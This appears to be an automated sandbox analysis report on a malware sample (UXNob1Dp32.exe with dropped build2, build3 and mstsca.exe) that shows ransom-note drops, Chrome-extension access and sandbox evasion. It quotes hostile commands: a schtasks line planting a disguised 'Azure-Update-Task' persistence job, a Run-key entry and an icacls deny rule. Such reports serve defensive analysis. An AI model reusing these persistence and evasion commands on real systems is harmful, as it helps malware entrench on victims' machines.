Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\f source: UXNob1Dp32.exe, 00000005.00000003.2120429793.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119548064.000000000315D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*v source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\% source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\AC\3 source: UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\lpane5 source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\k3a source: UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098895786.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098836614.0000000003431000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: UXNob1Dp32.exe, 00000005.00000003.2098127230.0000000003196000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\; source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Ro source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ows\ source: UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Users source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Unpacked PE file: 1.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 6.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 12.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Unpacked PE file: 14.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 24.2.UXNob1Dp32.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 27.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 32.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Unpacked PE file: 1.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 6.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 12.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Unpacked PE file: 14.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Unpacked PE file: 24.2.UXNob1Dp32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 27.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 32.2.mstsca.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

1_2_00412220

PE file contains sections with non-standard names

Source: build3[1].exe.5.dr	Static PE information: section name: .kic
Source: sqln[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.14.dr	Static PE information: section name: .kic

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_004052B5 push ecx; ret	0_2_004052C8
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_042670AF push ecx; retf	0_2_042670B2
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 0_2_05E58F05 push ecx; ret	0_2_05E58F18
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00428565 push ecx; ret	1_2_00428578
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_044210AF push ecx; retf	3_2_044210B2
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 3_2_05E78F05 push ecx; ret	3_2_05E78F18
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_0457A0AF push ecx; retf	4_2_0457A0B2
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Code function: 4_2_05DE8F05 push ecx; ret	4_2_05DE8F18

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html			Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	System file written: C:\Users\user\AppData\Local\Temp\chrome.exe			Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_00404F7E EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00404F7E

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Uses cacls to modify the permissions of files

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: build2.exe, 00000008.00000002.1752904498.00000000035A0000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 0_2_0426571C rdtsc

0_2_0426571C

Contains functionality to query network adapater information

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

1_2_0040E670

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Thread delayed: delay time: 700000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 930
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 9069

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.bgzq (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmp	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\UXNob1Dp32.exe TID: 7312	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep count: 930 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep time: -209250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep count: 9069 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 7984	Thread sleep time: -2040525s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: UXNob1Dp32.exe, 00000001.00000003.1641969430.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000753000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000003.1643163181.0000000000753000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000608000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: UXNob1Dp32.exe, 00000005.00000003.1735594551.00000000097F2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: UXNob1Dp32.exe, 00000005.00000003.1739145861.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
